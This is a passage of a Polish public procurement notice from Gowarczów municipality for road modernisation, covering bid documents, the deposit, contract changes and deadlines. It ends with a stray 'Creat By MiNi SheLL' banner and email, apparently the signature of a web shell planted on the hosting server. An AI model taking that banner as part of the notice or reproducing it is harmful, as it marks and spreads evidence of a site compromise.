jeżeli wykonawca z przyczyn niezależnych od niego nie jest<br/>w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty;<br/>załącznik nr 3<br/>b) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami; załącznik nr 4<br/>Jeżeli jest to niezbędne do zapewnienia odpowiedniego przebiegu postępowania o udzielenie zamówienia, zamawiający może na<br/>każdym etapie postępowania wezwać wykonawców do złożenia wszystkich lub niektórych podmiotowych środków dowodowych.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> DOKUMENTY SKŁADANE RAZEM Z OFERTĄ-Oferta przygotowana na formularzu systemowym oraz formularzu<br/>ofertowym stanowiącym załącznik nr 1 do SWZ (załączanym ze względu na zamieszczone w nim oświadczenia) , zgodnie z<br/>art. 63 ust. 2 ustawy Pzp, składana jest pod rygorem nieważności w postaci elektronicznej opatrzonej podpisem zaufanym,<br/>podpisem osobistym lub kwalifikowanym podpisem elektronicznym.-Wykonawca dołącza do oferty oświadczenie o<br/>niepodleganiu wykluczeniu oraz o spełnianiu warunków udziału w postępowaniu – załącznik nr 2 do SWZ, w zakresie<br/>wskazanym w rozdziale II punkt 7 i 8 SWZ. Oświadczenie stanowi dowód potwierdzający brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w postępowaniu, na dzień składania ofert, tymczasowo zastępując wymagane<br/>podmiotowe środki dowodowe, wskazane w rozdziale II pkt 9 ppkt 2 SWZ. Oświadczenia składane są pod rygorem<br/>nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym, podpisem osobistym lub<br/>kwalifikowanym podpisem elektronicznym. Oświadczenia składają odrębnie:- wykonawca/każdy spośród wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia. W takim przypadku oświadczenie potwierdza brak podstaw<br/>wykluczenia wykonawcy oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców<br/>wykazuje spełnianie warunków udziału w postępowaniu;- podmiot trzeci, na którego potencjał powołuje się wykonawca<br/>celem<br/>potwierdzenia spełnienia warunków udziału w postępowaniu. W takim przypadku oświadczenie potwierdza brak podstaw<br/>wykluczenia podmiotu oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim podmiot udostępnia swoje<br/>zasoby wykonawcy;- podwykonawcy, na których zasobach wykonawca nie polega przy wykazywaniu spełnienia warunków<br/>udziału w postępowaniu. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia podwykonawcy (jeżeli<br/>zamawiający weryfikuje podstawy wykluczenia w odniesieniu do podwykonawcy).-Do oferty wykonawca załącza również: a)<br/>pełnomocnictwo: gdy<br/>umocowanie osoby składającej ofertę nie wynika z dokumentów rejestrowych, wykonawca, który składa ofertę za<br/>pośrednictwem pełnomocnika, powinien dołączyć do oferty dokument pełnomocnictwa obejmujący swym zakresem<br/>umocowanie do złożenia oferty lub do złożenia<br/>oferty i podpisania umowy. W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia wykonawcy<br/>zobowiązani są do ustanowienia pełnomocnika. Dokument pełnomocnictwa, z treści którego będzie wynikało umocowanie<br/>do reprezentowania w postępowaniu o udzielenie zamówienia tych wykonawców należy załączyć do oferty. Pełnomocnictwo<br/>powinno być załączone do oferty i powinno zawierać w szczególności wskazanie:- postępowania o zamówienie publiczne,<br/>którego dotyczy,- wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z<br/>określeniem adresu siedziby,- ustanowionego pełnomocnika oraz zakresu jego umocowania. Oświadczenie<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia-Wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia, spośród których tylko jeden spełnia warunek dotyczący uprawnień, są zobowiązani dołączyć do oferty<br/>oświadczenie, z którego wynika, które roboty<br/>budowlane, dostawy lub usługi wykonają poszczególni wykonawcy. Wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji<br/>których te zdolności są wymagane. W takiej sytuacji wykonawcy są zobowiązani dołączyć do oferty oświadczenie, z którego<br/>wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca jest zobowiązany wnieść wadium w wysokości: (max do 1,5%)<br/>W przedmiotowym postępowaniu wadium wynosi:<br/>Wadium 55.000,00 zł. (słownie złotych: pięćdziesiąt pięć tysięcy 00/100). Wadium może być wniesione w jednej lub kilku<br/>następujących formach:<br/>a) pieniądzu;<br/>b) gwarancjach bankowych;<br/>c) gwarancjach ubezpieczeniowych;<br/>d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. Wadium wnoszone w pieniądzu należy wpłacić przelewem na<br/>następujący rachunek bankowy Zamawiającego:<br/>BS Przysusze/ Filia Gowarczów<br/>Nr 77 9145 1109 3500 2567 2000 0002 z adnotacją „Wadium – Znak sprawy: ORG.272.2.2022 – Modernizacja infrastruktury<br/>drogowej na obszarze gminy Gowarczów - III wniosek do 5 mln”. Za skuteczne wniesienie wadium w pieniądzu,<br/>Zamawiający uzna wadium, które zostanie zaksięgowane na rachunku bankowym Zamawiającego przed upływem terminu<br/>składania ofert. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia wykonawca przekazuje zamawiającemu<br/>oryginał gwarancji lub poręczenia, w postaci elektronicznej – przed upływem terminu składania ofert. W przypadku<br/>wnoszenia wadium w formie gwarancji bankowej lub ubezpieczeniowej, lub poręczenia gwarancja lub poręczenie musi być<br/>nieodwołalne, bezwarunkowe i płatne na pierwsze pisemne żądanie Zamawiającego, sporządzone zgodnie z<br/>obowiązującymi przepisami i powinna zawierać następujące elementy:<br/>a) nazwę: dającego zlecenie (wykonawcy), beneficjenta gwarancji/poręczenia (zamawiającego), gwaranta lub poręczyciela<br/>oraz wskazanie ich siedzib,<br/>Ogłoszenie nr 2022/BZP 00093961/01 z dnia 2022-03-22<br/>2022-03-22 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>b) kwotę wadium <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku:<br/>Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu<br/>albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego.<br/>Wszelka korespondencja będzie prowadzona przez zamawiającego wyłącznie z pełnomocnikiem. Załącznik nr 7 załączany<br/>wraz z ofertą.<br/>7.3 W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunki, o których mowa w pkt 7.1 ppkt.<br/>zostaną spełnione wyłącznie jeżeli:<br/>a) w przypadku, o którym mowa w pkt 7.1 ppkt 4 lit. A niniejszego rozdziału, jeden z Wykonawców lub podmiotów<br/>udostępniających zasoby spełni warunek samodzielnie. Nie sumuje się doświadczenia zawodowego – argumentacja na<br/>podstawie sentencji wyroku Krajowej Izby Odwoławczej z dnia 7 sierpnia 2014 r. [sygn. akt: KIO 1495/14]),<br/>b) W przypadku, o którym mowa w pkt. 7.1. ppkt 4 lit. b niniejszego rozdziału, chociaż jeden z Wykonawców lub podmiotów<br/>udostępniających zasoby spełni warunek samodzielnie lub łącznie spełnią warunek. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmianie mogą podlegać postanowienia umowy, których nie udało się przewidzieć przed wszczęciem postępowania, np.:<br/>a) roboty dodatkowe ,<br/>b) zakres prac z uwagi na konieczne zmiany w projekcie,<br/>c) przedłużenie terminu wykonania umowy:<br/>- o czas niezbędny na dokonanie zmian w dokumentacji projektowej oraz w przypadku zaistnienia takiej konieczności o czas<br/>niezbędny dla dostosowania się Wykonawcy do takiej zmiany;<br/>- o czas niezbędny do wykonania robót zamiennych;<br/>- o czas związany z oczekiwaniem na decyzję organów administracji publicznej lub innych podmiotów właściwych do<br/>wydania koniecznych decyzji, zezwoleń, uzgodnień, opinii, stanowisk itp. niezbędnych do prawidłowej realizacji<br/>wykonywanych robót, na które nie ma wpływu Wykonawca;<br/>- o czas niezbędny na poprawę warunków wykonywania robót zagrażających bezpieczeństwu życia, zdrowia i mienia;<br/>- w przypadku zaistnienia nieprzewidzianych warunków geologicznych, hydrogeologicznych, wykopalisk, wyjątkowo<br/>niekorzystnych warunków klimatycznych, a także innych przeszkód lub skażeń uniemożliwiających kontynuowanie robót;<br/>- konieczności usunięcia niewypałów i niewybuchów;<br/>- konieczność przeprowadzenia wykopalisk uniemożliwiających wykonywanie robót lub wykopalisk archeologicznych;<br/>- gdy zaistnieją okoliczności niezależne od Wykonawcy, których nie można było przewidzieć w chwili zawarcia umowy, pod<br/>warunkiem, że zmiana ta sprzyjać będzie należytemu wykonaniu zamówienia, jak również oszczędnemu, celowemu i<br/>gospodarnemu wydatkowaniu środków publicznych – o okres trwania tych okoliczności;<br/>- gdy wystąpią zdarzenia losowe uniemożliwiające wykonanie przedmiotu umowy, w szczególności: działanie siły wyższej,<br/>klęska żywiołowa, administracyjne, środowiskowe, akt terroru, katastrofa – o okres trwania tych okoliczności;<br/>- wstrzymania prac budowlanych przez właściwy organ z przyczyn niezawinionych przez Wykonawcę - o okres, na który wstrzymano prace;<br/>- wstrzymania prac budowlanych przez Zamawiającego lub przez właściwy organ w szczególności w przypadku<br/>wystąpienia: niewypałów i niewybuchów, wykopalisk archeologicznych, warunków geologicznych, archeologicznych lub<br/>terenowych uniemożliwiających wykonanie przedmiotu umowy - o okres na który wstrzymano prace.<br/>2. Zmiana technologii wykonania robót na wniosek Wykonawcy lub Zamawiającego, pod warunkiem, że zmiana ta będzie<br/>korzystna dla Zamawiającego.<br/>3. Zmiana jakości lub innych parametrów charakterystycznych dla objętego proponowaną zmianą elementu robót<br/>budowlanych.<br/>4. Odstąpienia od realizacji części robót i związanej z tym zmiany wynagrodzenia na wniosek Zamawiającego.<br/>5. Zmiana podwykonawcy robót.<br/>6. Zmiana osoby pełniącej funkcję kierownika budowy. W takim przypadku Wykonawca zobowiązany jest zastąpić tę osobę<br/>inną, spełniającą warunki określone w prawie budowlanym.<br/>7. Zmiany postanowień umownych zakwalifikowane przez strony jako nieistotne, mogą być wprowadzone do umowy w<br/>każdym czasie.<br/>8. W przypadku zmiany przepisów mających wpływ na realizacje zamówienia, umowa zostanie zmieniona w tym zakresie.<br/>9. W przypadku wpływu okoliczności związanych z wystąpieniem COVID-19 na należyte wykonanie tej umowy (o ile taki<br/>wpływ wystąpił lub może wystąpić), Strony umowy niezwłocznie, wzajemnie informują się o wpływie okoliczności<br/>związanych z wystąpieniem COVID-19 na należyte wykonanie tej umowy i potwierdzają ten wpływ dołączając do informacji,<br/>o której mowa w zdaniu pierwszym, oświadczenia lub dokumenty, które mogą dotyczyć tych okoliczności, wymienione w art.<br/>15 r ustawy z dnia 02 marca 2020 r. (tekst. jedn. Dz. U. z 2020 r. poz. 1842 z późn.zm.), stosując się do postanowień<br/>określonych w tym przepisie. Jeżeli Zamawiający stwierdzi, że okoliczności związane z wystąpieniem COVID-19, wpływają<br/>na należyte wykonanie umowy jest zobowiązany podjąć kroki prawne opisane w cytowanej ustawie.<br/>10. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią one jednak zobowiązania do wyrażenia takiej zgody. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-14 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://gowarczow.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-14 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-05-13</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com